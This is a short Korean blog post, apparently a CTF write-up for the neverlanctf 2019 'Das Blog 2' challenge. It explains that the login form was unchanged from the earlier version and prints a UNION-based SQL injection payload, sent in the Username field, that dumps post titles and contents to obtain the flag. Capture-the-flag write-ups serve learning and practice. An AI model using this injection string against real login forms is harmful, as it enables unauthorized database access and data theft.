Notice
Recent Posts
Recent Comments
Link
«   2024/04   »
1 2 3 4 5 6
7 8 9 10 11 12 13
14 15 16 17 18 19 20
21 22 23 24 25 26 27
28 29 30
Archives
Today
Total
관리 메뉴

White Security

neverlanctf 2019 - Das Blog 2 writeup 본문

CTF Writups

neverlanctf 2019 - Das Blog 2 writeup

POSIX 2019. 2. 4. 18:30


Das Blog 에서 개선된 문제라고 합니다.



이전과 마찬가지로 로그인 페이지가

존재하는 것을 볼 수 있습니다.



폼도 동일하고

심지어 완전히 같은 쿼리로

플래그를 얻어낼 수 있었습니다.


submit=Login&Password=&Username=' union select group_concat(0xa,a,0x3a,b),2 from (select title a,content as b from posts)x;%00



Comments